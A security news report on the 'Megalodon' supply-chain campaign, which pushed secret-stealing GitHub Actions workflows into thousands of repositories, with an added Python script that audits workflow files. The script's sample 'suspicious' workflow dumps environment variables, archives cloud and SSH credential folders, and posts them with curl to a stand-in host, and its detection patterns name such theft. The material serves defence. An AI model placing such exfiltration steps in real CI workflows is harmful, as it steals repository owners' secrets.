Over 5,500 GitHub Repositories Infected in ‘Megalodon’ Supply Chain Attack


More than 5,500 GitHub repositories were infected with malware in a supply chain attack that relies on automated commits, security researchers warn.

The campaign, dubbed Megalodon, relies on GitHub Actions workflows containing a payload designed to steal credentials, keys, tokens, and other secrets.

The workflows, SafeDep says, were injected through over 5,700 malicious commits pushed to the impacted repositories within a six-hour window, on May 18.

According to the cybersecurity firm, the attackers deployed two payloads as part of the attack. One added a new workflow that would be triggered on every push and pull request; the other replaced existing workflows with specific triggers, creating dormant backdoors that would only fire on those events.

On infected machines, the malware would exfiltrate all CI environment variables, AWS credentials, GCP access tokens, Azure credentials, SSH private keys, Docker and Kubernetes configurations, API keys, database connection strings, GitHub Actions tokens, GitLab CI/CD tokens, and dozens of...
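For readers auditing their own repositories, the following script is an added example, not SafeDep's tooling or anything from the report. It scans a GitHub Actions workflow file for the two traits described above: broad `push`/`pull_request` triggers, and steps that gather secrets, CI environment variables or credential files and send them off-host. The two sample workflows, the heuristics and the `collector.example` hostname are constructed for the demonstration and are not indicators from the campaign.

```python
import re

# Constructed sample workflows for the demo; neither is an artifact from the campaign.
BENIGN_WORKFLOW = """\
name: ci
on:
  pull_request:
    branches: [main]
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci
      - run: npm test
"""

SUSPICIOUS_WORKFLOW = """\
name: ci
on: [push, pull_request]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Build
        env:
          ALL: ${{ toJSON(secrets) }}
        run: |
          env > /tmp/e.txt
          tar czf /tmp/c.tgz ~/.aws ~/.ssh ~/.kube ~/.docker 2>/dev/null
          curl -s -X POST --data-binary @/tmp/e.txt http://collector.example/upload
"""

BROAD_TRIGGERS = {"push", "pull_request", "pull_request_target"}

# Heuristics applied to the shell inside `run:` steps. Each pattern is an assumption
# about what credential theft looks like, not a signature taken from the report.
EXFIL_RULES = [
    ("dumps CI environment variables",
     re.compile(r"(?:^|[;&|\s])(?:env|printenv)\s*(?:>|\||$)", re.M)),
    ("reads cloud, SSH or container credential files",
     re.compile(r"(?:~|\$HOME)?/?\.(?:aws|ssh|kube|docker|gcloud|azure)\b")),
    ("decodes and executes an encoded payload",
     re.compile(r"base64\s+(?:-d|--decode)\s*\|\s*(?:ba)?sh\b")),
]
NETWORK_RE = re.compile(r"\b(?:curl|wget|nc|ncat)\b")


def triggers(text):
    """Return the event names in the top-level `on:` block (inline or nested form)."""
    lines = text.splitlines()
    found = set()
    for i, line in enumerate(lines):
        m = re.match(r"^on:\s*(.*)$", line)
        if not m:
            continue
        inline = m.group(1).strip()
        if inline:                       # on: push   /   on: [push, pull_request]
            found.update(re.findall(r"[A-Za-z_]+", inline))
            continue
        base = None                      # nested form: event keys sit at the first indent level
        for nxt in lines[i + 1:]:
            if not nxt.strip() or nxt.lstrip().startswith("#"):
                continue
            indent = len(nxt) - len(nxt.lstrip(" "))
            if indent == 0:
                break
            base = indent if base is None else base
            if indent == base:
                key = re.match(r"\s*-?\s*([A-Za-z_]+)", nxt)
                if key:
                    found.add(key.group(1))
    return found


def run_bodies(text):
    """Collect the shell from every `run:` step, handling inline values and block scalars."""
    lines = text.splitlines()
    bodies, i = [], 0
    while i < len(lines):
        m = re.match(r"^\s*(?:-\s+)?run:\s*(.*)$", lines[i])
        if not m:
            i += 1
            continue
        rest = m.group(1).strip()
        if rest and not rest.startswith(("|", ">")):
            bodies.append(rest)
            i += 1
            continue
        key_indent = lines[i].index("run:")   # block scalar: keep lines indented past the key
        block, i = [], i + 1
        while i < len(lines):
            ln = lines[i]
            if ln.strip() and len(ln) - len(ln.lstrip(" ")) <= key_indent:
                break
            block.append(ln.strip())
            i += 1
        bodies.append("\n".join(block))
    return bodies


def audit_workflow(text):
    """Report which events fire the workflow and whether its steps look like a secret stealer."""
    events = triggers(text)
    findings = []
    broad = events & BROAD_TRIGGERS
    if broad:
        findings.append("fires on broad events: " + ", ".join(sorted(broad)))
    if re.search(r"toJSON\(\s*secrets\s*\)", text):
        findings.append("exposes every repository secret via toJSON(secrets)")
    script = "\n".join(run_bodies(text))
    for label, rule in EXFIL_RULES:
        if rule.search(script):
            findings.append(label)
    exfil = any(not f.startswith("fires on") for f in findings)
    network = bool(NETWORK_RE.search(script))
    severity = "high" if exfil and network else "medium" if exfil else "none"
    return {"triggers": sorted(events), "findings": findings, "severity": severity}


if __name__ == "__main__":
    for name, wf in (("benign", BENIGN_WORKFLOW), ("suspicious", SUSPICIOUS_WORKFLOW)):
        print(name, audit_workflow(wf))
```

Run it over every file under `.github/workflows/` in a checkout, and over the same paths in recent commits (for example `git show <commit>:.github/workflows/ci.yml`), since the report describes payloads that replace existing workflows rather than only adding new ones. A broad trigger on its own is normal CI and is reported only as context; the severity rises when a step both collects secrets, environment variables or credential files and contacts the network.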

Copyright of this story solely belongs to securityweek.com.

